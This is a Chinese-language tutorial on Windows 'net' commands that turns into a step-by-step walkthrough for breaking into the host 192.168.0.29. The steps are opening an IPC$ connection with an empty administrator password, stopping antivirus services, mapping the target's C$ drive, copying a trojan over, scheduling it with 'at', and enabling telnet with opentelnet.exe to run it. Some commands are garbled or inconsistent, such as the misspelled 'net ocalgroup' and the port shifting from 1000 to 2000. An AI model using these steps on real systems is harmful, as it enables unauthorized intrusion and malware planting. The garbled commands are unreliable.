2-10-1net命令详解
(1)net share - 查看共享命令
net share ipc$ 设置ipc$共享
net share ipc$ /del - 删除ipc$共享 (xp系统无法删除,通过注册表关闭)
net share c$=c: 设置c盘为共享例如d盘 net share d$=d:
net share c$ /del 删除c盘共享
(2)net user - 查看本地的用户列表
net user 用户名密码 /add 增加一个用户
net user 用户名 /add 或 net user 用户名 "" /add 增加一个密码为空的用户 net user 用户名 /del 删除某个用户名
net user 用户名 /active:yes(no) 设置某个用户的状态为启用(禁用) (3)net localgroup administrators 查看管理员组里的用户(即权限为管理员的用户)
net localgroup administrators 用户名 /add 把某个用户增加到管理员组里 net ocalgroup administrators 用户名 /del 从管理员组里删除某个用户注意:1.增加到某个组里的用户必须是已经被创建过的用户.
2.增加到的组必须为存在的组.
(4)net start - 查看已经启动的服务列表(服务名加双引号)
该命令用于入侵后可以关闭一些服务比如说是杀毒软件
net start 服务名 - 开启某个服务
注意:要想成功的开启一个服务,前提是它被停用了,而不是被禁止
服务名 - 停止某个服务
注意:停止的服务必须是已经启动的,而不是已经停止或是被禁止的
例如 net stop “remote registry”
开始实战:侵入192.168.0.29的主机
5)net use \\ip地址\ipc$ "密码" /user:用户名
(注意这是use不是user)
例如:net use \\192.168.0.29\ipc$“” /user: administrator
————和某个ip地址建立一个ipc$连接(ipc$入侵)
命令成功完成后就建立了连接,就已经进入该主机,可以做任何事情
net use \\ip地址\ipc$ /del ————删除建立的ipc$连接
命令成功与否的前提:
1.对方操作系统是否为NT以上的(除xp外)
2.对方系统是否开启了ipc$共享
3.输入的用户名和密码是否正确
如何映射对方盘符到自己电脑上?
(6)net use h: \\ip地址\c$ - 将对方c盘映射到本地的h盘
1 net use h: /del -删除映射到本地的磁盘
例如将将对方机子的c盘映射到z盘 net use z: \\192.168.0.29\c$
映射过来后我们就可以传我们的木马都对方机子了
注意:1.要映射到本地的磁盘名不能与本地现有的磁盘名重复(冲突)
2.想要映射对方的某个磁盘或目录的前提是对方的此磁盘或目录设置了共享
2.copy 磁盘:\程序名 \\ip地址\c$\要保存的程序名
直接用命令做也可以将我们的木马上传到服务器上
https://www.wendangku.net/doc/ea10863.html, time \\ip地址查看某ip地址的计算机系统上的时间
注意:除了查看本机时间可直接输入此命令外,在查看其他ip地址的时间之前必须建立ipc$连接
4.at \\ip地址时间要运行的程序(该步骤是执行程序)
指定远程计算机在某个时间点运行指定的程序
但是该处会出现“绑定句柄无效“字样该原因是2000少一个文件
下面看该怎么做?
需要一款工具opentelnet.exe 在cmd下输入
opentelnet \\ip administrator "" 0 1000
ip是对方ip administration是对方的管理员账号““是对方管理员密码
0 是需要认真(1 则是取消认证) 1000是端口自己可以修改该端口
5最后用telnet 192.168.0.29 2000来远程登录
出现该界面输入账号和密码
出现该界面,即得到一个cmd的权限例如输入123.exe便可以运行了木马就可以运行了